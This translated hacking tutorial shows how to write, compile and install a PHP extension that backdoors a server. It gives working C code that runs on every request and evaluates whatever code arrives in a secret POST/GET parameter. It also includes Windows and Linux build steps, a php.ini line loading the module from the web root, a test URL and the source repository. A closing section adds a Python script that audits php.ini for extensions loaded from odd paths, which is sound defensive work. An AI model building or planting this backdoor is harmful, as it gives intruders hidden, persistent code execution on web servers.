0x00 Preface
Today we'll discuss writing a backdoor based on a PHP extension library. Typically, most intruders leave a backdoor as a custom block of code in a script. Of course, such things are easily found through static or dynamic analysis of the source code.
The benefits of leveraging a PHP extension library are obvious:
1) it is difficult to find;
2) it bypasses the disable_functions option;
3) it has the ability to control all code (access to the code execution API).
But it requires the ability to edit the PHP configuration file.
0x01 Details
"Translator's note: on Linux it takes two commands; why does Windows cost so much effort?"
As an example, I'll write the extension on Windows, using my Visual Studio Express. You also need the latest version of the PHP source code and the compiled PHP library (which can be built from the same source). For simplicity, we use the php-5.5.15 Win32 VC11 x86 build and the source archive php-5.5.15-src.zip.
Unpack the compiled PHP into C:\php and the source code into C:\php-src.
Then a few project settings are required.
1) Add preprocessor definitions:
ZEND_DEBUG=0 ZTS=1 ZEND_WIN32 PHP_WIN32
(Screenshot: preprocessor definitions)
2) Add the include directories for the source:
C:\php-src\main C:\php-src\Zend C:\php-src\TSRM C:\php-src\regex C:\php-src
(Screenshot: additional include directories)
3) Add the library directory containing php5ts.lib (C:\php\dev).
(Screenshot: additional library directories)
4) Add php5ts.lib as a linker dependency.
(Screenshot: additional dependencies)
5) Specify the output path for the compiled file.
(Screenshot: output file configuration)
Setting up the workspace for extension development is described in more detail at http://blog.slickedit.com/2007/09/creating-a-php-5-extension-with-visual-c-2005/. Create a new project named backdoor of the type "Win32 Console Application".
In Visual Studio, select the project type DLL.
(Screenshot: selecting the appropriate type)
Then remove the unnecessary files from the project; only backdoor.cpp, stdafx.cpp and stdafx.h should remain.
In the header file stdafx.h:
#pragma once
#ifndef STDAFX
#define STDAFX
#include "zend_config.w32.h"
#include "php.h"
#endif
Now we move on to the PHP extension code itself. Delete all the lines in backdoor.cpp and add the required includes:
#include "stdafx.h"
#include "zend_config.w32.h"
#include "php.h"
If the workspace settings are correct, the warnings disappear.
When a module is initialized there are several events, each of which takes place under certain conditions. We need our code to execute while a request is being processed. To do this we declare the request-initialization function we need, which I'll name «hideme»:
PHP_RINIT_FUNCTION(hideme);
Then let's look at the module entry:
zend_module_entry hideme_ext_module_entry = {
    STANDARD_MODULE_HEADER,
    "simple backdoor",
    NULL,                 /* functions */
    NULL,                 /* MINIT */
    NULL,                 /* MSHUTDOWN */
    PHP_RINIT(hideme),    /* RINIT: runs on every request */
    NULL,                 /* RSHUTDOWN */
    NULL,                 /* MINFO */
    "1.0",
    STANDARD_MODULE_PROPERTIES
};
ZEND_GET_MODULE(hideme_ext);
In this article we only need the request hook that executes the code, so the module startup and shutdown handlers are replaced by NULL.
Now let's look at the body of the hideme function:
PHP_RINIT_FUNCTION(hideme)
{
    char* method = "_POST";                 /* superglobal array from which we take the parameter and its value */
    char* secret_string = "secret_string";  /* parameter name; its value will be the code to run */
    /* Translator's note: in the original author's GitHub code the method is _GET and secret_string is "execute";
       please follow the GitHub code when testing and do not modify the original. */
    zval** arr;
    char* code;
    if (zend_hash_find(&EG(symbol_table), method, strlen(method) + 1, (void**)&arr) != FAILURE) {
        HashTable* ht = Z_ARRVAL_P(*arr);
        zval** val;
        /* find the required parameter in the hash */
        if (zend_hash_find(ht, secret_string, strlen(secret_string) + 1, (void**)&val) != FAILURE) {
            code = Z_STRVAL_PP(val);                          /* the value */
            zend_eval_string(code, NULL, (char*)"" TSRMLS_CC); /* code execution */
        }
    }
    return SUCCESS;
}
The comments should make this clear. First we set the HTTP method (the superglobal array) and the parameter name secret_string. Then we look up that parameter in the array, and if it is present we take the instruction from its value and execute it through zend_eval_string.
The compiled result can be used as an extension library.
Download source code
https://github.com/akamajoris/php-extension-backdoor
0x02 Test
The following is a screenshot of the translator's test:
http://127.0.0.1:1629/20140917/test.php?execute=phpinfo();
(because the original author's GitHub code uses the parameter name execute)
Linux compilation (Kali)
apt-get install php5-dev
phpize && ./configure && make
Tested again under Kali, successfully. I was lazy: just chmod it and copy it to /var/www, haha.
Then add to php.ini:
extension=/var/www/back.so
Restart Apache; the test succeeds.
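Because the only persistent configuration artifact this technique leaves is a php.ini directive that loads a shared object from an unusual location (here the web root), a defender's first check is to audit the PHP configuration for extension and zend_extension entries whose path lies outside extension_dir or the distribution's module directories. The following Python script is an added example and is not code from the article or from the linked GitHub repository; the trusted directory list, the web-root prefixes and the sample php.ini are constructed assumptions for illustration.

```python
"""Audit php.ini-style text for extension directives that load modules from
unexpected locations. Added example, not part of the original article."""
import os
import re

# Assumed trusted module directories (adjust for your distribution).
DEFAULT_TRUSTED_DIRS = ("/usr/lib/php", "/usr/lib64/php", "/usr/local/lib/php")
# Assumed locations that should never hold loadable PHP modules.
SUSPICIOUS_PREFIXES = ("/var/www", "/srv/http", "/tmp", "/dev/shm", "/home")

DIRECTIVE_RE = re.compile(
    r'^\s*(zend_extension|extension)\s*=\s*"?([^"\s;]+)"?', re.IGNORECASE)
EXTDIR_RE = re.compile(r'^\s*extension_dir\s*=\s*"?([^"\s;]+)"?', re.IGNORECASE)


def _under(path, directory):
    """True if path lies inside directory (POSIX paths)."""
    return os.path.normpath(path).startswith(os.path.normpath(directory) + os.sep)


def audit_ini(text, trusted_dirs=DEFAULT_TRUSTED_DIRS):
    """Return a list of (line_no, directive, path, reason) for suspicious entries.

    An entry is flagged when it uses an absolute path outside extension_dir and
    the trusted directories, when it points into a web root or scratch
    directory, or when it uses a relative path with a directory component.
    """
    findings = []
    extension_dir = None
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith((";", "#", "[")):
            continue  # comments, blank lines and section headers
        m = EXTDIR_RE.match(line)
        if m:
            extension_dir = m.group(1)  # later extension= lines are relative to this
            continue
        m = DIRECTIVE_RE.match(line)
        if not m:
            continue
        directive, value = m.group(1).lower(), m.group(2)
        reasons = []
        if os.path.isabs(value):
            if any(_under(value, p) for p in SUSPICIOUS_PREFIXES):
                reasons.append("module loaded from web root or scratch directory")
            allowed = list(trusted_dirs) + ([extension_dir] if extension_dir else [])
            if not any(_under(value, d) for d in allowed):
                reasons.append("absolute path outside extension_dir and trusted dirs")
        elif "/" in value or "\\" in value:
            reasons.append("relative path with directory component")
        if reasons:
            findings.append((no, directive, value, "; ".join(reasons)))
    return findings


# Constructed sample php.ini fragment; the last two entries imitate the
# planted directive described above.
SAMPLE_INI = """\
[PHP]
extension_dir = "/usr/lib/php/20131226"
extension=mysqli.so
extension=/usr/lib/php/20131226/curl.so
; planted entry
extension=/var/www/back.so
zend_extension=/tmp/.x/opcache.so
"""

if __name__ == "__main__":
    for line_no, directive, path, reason in audit_ini(SAMPLE_INI):
        print("line %d: %s=%s  [%s]" % (line_no, directive, path, reason))
```

In practice run audit_ini over the main php.ini and every file in the conf.d directory that the running PHP actually reads (php --ini lists them), and compare the flagged paths against package-manager ownership; a module file that no package owns is worth a closer look.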